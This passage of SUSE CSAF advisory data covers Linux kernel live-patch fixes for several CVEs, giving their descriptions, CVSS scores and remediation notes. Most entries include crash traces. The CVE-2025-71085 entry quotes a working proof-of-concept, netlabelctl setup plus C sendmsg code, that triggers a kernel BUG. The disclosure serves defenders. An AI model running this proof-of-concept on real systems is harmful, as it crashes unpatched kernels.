"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1102-1
Vulnerability from csaf_suse - Published: 2026-03-27 08:05 - Updated: 2026-03-27 08:05
Summary
Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.28 fixes various security issues
The following security issues were fixed:
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1106
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — | | Vendor Fix |
